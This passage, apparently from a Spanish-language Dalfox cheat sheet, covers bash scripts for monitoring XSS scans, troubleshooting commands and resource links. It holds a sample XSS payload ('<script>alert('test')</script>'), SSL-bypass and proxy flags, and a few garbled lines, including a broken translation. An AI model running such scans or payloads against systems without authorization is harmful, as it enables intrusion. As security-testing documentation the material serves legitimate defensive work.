while true; do
if pgrep -f "dalfox" > /dev/null; then
local cpu=$(ps -p $(pgrep -f "dalfox") -o %cpu --no-headers | awk '{sum+=$1} END {print sum}')
local mem=$(ps -p $(pgrep -f "dalfox") -o rss --no-headers | awk '{sum+=$1} END {print sum/1024}')
| local net=$(cat /proc/net/dev | grep -E "(eth0 | wlan0)" | awk '{print ($2+$10)/1024}') |
echo "$(date +%s),$cpu,$mem,$net"
fi
sleep 5
done
} > "$output_file" &
local monitor_pid=$!
# Run Dalfox scan
dalfox url "$target" \
--worker 20 \
--timeout 30 \
--mining-dict \
--dom \
--format json \
--output "scan-results-$(date +%s).json"
# Stop monitoring
kill $monitor_pid 2>/dev/null
echo "Performance monitoring completed: $output_file"
}
# Usage
monitor_dalfox_performance "https://example.com"
Problemas comunes
# Debug connection issues
dalfox url https://example.com --debug --verbose
# Test with different user agents
dalfox url https://example.com --user-agent "Mozilla/5.0 (compatible; DalfoxBot/1.0)"
# Bypass SSL certificate issues
dalfox url https://example.com --ignore-ssl
# Handle rate limiting
dalfox url https://example.com --delay 5000 --retry 3
# Debug payload issues
dalfox url https://example.com --custom-payload "<script>alert('test')</script>" --debug
# Test proxy configuration
dalfox url https://example.com --proxy http://127.0.0.1:8080 --debug
# Verify installation
dalfox version
dalfox help
# Check for updates
go install github.com/hahwul/dalfox/v2@latest
# Common error solutions
troubleshoot_dalfox() {
echo "Dalfox Troubleshooting Guide"
echo "==========================="
# Check if Dalfox is installed
if ! command -v dalfox &> /dev/null; then
echo "❌ Dalfox not found in PATH"
echo "Solution: Install Dalfox using one of the installation methods"
return 1
fi
echo "✅ Dalfox found: $(which dalfox)"
echo "Version: $(dalfox version)"
# Check network connectivity
if ! curl -s --connect-timeout 5 https://httpbin.org/get > /dev/null; then
echo "❌ Network connectivity issues"
echo "Solution: Check internet connection and proxy settings"
return 1
fi
echo "✅ Network connectivity OK"
# Test basic functionality
echo "Testing basic Dalfox functionality..."
if dalfox url https://httpbin.org/get --timeout 10 --silence; then
echo "✅ Basic functionality test passed"
else
echo "❌ Basic functionality test failed"
echo "Solution: Check Dalfox installation and permissions"
return 1
fi
# Check for common issues
echo "Checking for common configuration issues..."
# Check Go version if installed via Go
if command -v go &> /dev/null; then
| local go_version=$(go version | awk '{print $3}' | sed 's/go//') |
echo "Go version: $go_version"
if [[ "$go_version" < "1.19" ]]; then
echo "⚠️ Go version may be too old for latest Dalfox"
echo "Solution: Update Go to version 1.19 or later"
fi
fi
echo "Troubleshooting completed"
}
# Run troubleshooting
troubleshoot_dalfox
Recursos y documentación
Recursos oficiales
- Dalfox GitHub Repository - Repositorio principal y documentación
- Dalfox Wiki - Guía de uso integral
- Release Notes - Actualizaciones y cambios
- Docker Hub - Imágenes oficiales Docker
Recursos comunitarios
- Dalfox Discussions - Community Q beneficiarA and discussions
- Bug Reports - Registro de errores e informes de errores
- Security Research Blog - Blog del autor con investigación de seguridad
- XSS Research Papers - OWASP XSS documentation
Ejemplos de integración
- CI/CD Plantillas - Configuraciones de ejemplo
- Burp Suite Extensiones - Ejemplos de integración Burp
- Nuclei Templates - Plantillas de vulnerabilidad complementarias
- Bug Bounty Methodologies - XSS hunting methodologies